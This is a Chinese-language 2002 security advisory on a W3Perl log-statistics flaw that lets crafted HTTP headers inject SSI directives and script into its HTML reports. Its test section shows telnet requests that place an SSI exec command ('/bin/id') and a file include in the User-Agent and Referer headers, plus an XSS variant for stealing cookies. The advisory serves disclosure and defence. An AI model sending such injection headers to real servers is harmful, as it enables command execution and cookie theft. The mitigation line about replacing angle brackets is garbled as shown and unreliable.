|
|
W3Perl 站点统计HTTP头可操作漏洞
发布时间:2002-01-28
更新时间:2002-01-28
严重程度:中
威胁程度:服务器信息泄露
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID:3939
受影响系统W3Perl W3Perl 2.81
- Apache Group Apache 1.3.17
- Apache Group Apache 1.3.17win32
- Apache Group Apache 1.3.18
- Apache Group Apache 1.3.18win32
- Apache Group Apache 1.3.19
- Apache Group Apache 1.3.19win32
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
- Apache Group Apache 1.3.22
- Microsoft IIS 4.0
- Microsoft IIS 5.0
W3Perl W3Perl 2.82
- Apache Group Apache 1.3.17
- Apache Group Apache 1.3.17win32
- Apache Group Apache 1.3.18
- Apache Group Apache 1.3.18win32
- Apache Group Apache 1.3.19
- Apache Group Apache 1.3.19win32
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
- Apache Group Apache 1.3.22
- Microsoft IIS 4.0
- Microsoft IIS 5.0
W3Perl W3Perl 2.83
- Apache Group Apache 1.3.17
- Apache Group Apache 1.3.17win32
- Apache Group Apache 1.3.18
- Apache Group Apache 1.3.18win32
- Apache Group Apache 1.3.19
- Apache Group Apache 1.3.19win32
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
- Apache Group Apache 1.3.22
- Microsoft IIS 4.0
- Microsoft IIS 5.0
W3Perl W3Perl 2.84
- Apache Group Apache 1.3.17
- Apache Group Apache 1.3.17win32
- Apache Group Apache 1.3.18
- Apache Group Apache 1.3.18win32
- Apache Group Apache 1.3.19
- Apache Group Apache 1.3.19win32
- Apache Group Apache 1.3.20
- Apache Group Apache 1.3.20win32
- Apache Group Apache 1.3.22
- Microsoft IIS 4.0
- Microsoft IIS 5.0
W3Perl W3Perl 2.85
- Apache Group Apache 1.3.17
- Apache Group Apache 1.3.17win32
- Apache Group Apache 1.3.18
- Apache Group Apache 1.3.18win32
- Apache Group Apache 1.3.19
- Apache Group Apache 1.3.19win32
- Apache Group Apache 1.3.20win32
- Apache Group Apache 1.3.22
- Microsoft IIS 4.0
- Microsoft IIS 5.0 详细描述
W3Perl 是一款免费开放源代码的WEB统计软件,可以产生站点使用统计,并记录
成文件输出为HTML形式,用户可以选择各种级别的详细报告。
W3Perl从日志文件中处理时没有很好的进行净化处理,结果可以导致攻击者恶意
注入精心构建的数据并在最后HTML形式上显示。
攻击者可以通过构建包含恶意脚本代码的HTTP 头来使的出现跨站脚本攻击,最终
偷取相关认证的COOKIE信息。
测试代码
如在SSI支持情况下,利用如下操作,可以导致插入文件包含,并根据服务配置
执行命令:
su-2.05# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Referer: <!--#virtual include="somefile.log"-->
User-Agent: <!--#exec cmd="/bin/id"-->
HTTP/1.1 200 OK
Date: Mon, 17 Dec 2001 20:39:02 GMT
Server:
Connection: close
Content-Type: text/html
下面的操作,可以导致偷取用户的COOKIE信息:
su-2.05# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Referer: <javascript-that-is-evil-so-there's-no-need-for-examples>
User-Agent: </html>
解决方案
临时方法:
1,处理一些元字符如:<>":;'}{][|\)(*&^%$#!`,这可以防止HTML,JAVASCRIPT。
PHP,SQL插入。
2,使用> <来代替<和>,可以防止标签执行。
相关信息
zeno <bugtraq@cgisecurity.net>.
参考:http://www.securityfocus.com/archive/1/251906
相关主页:http://www.w3perl.com/softs/index.html
|
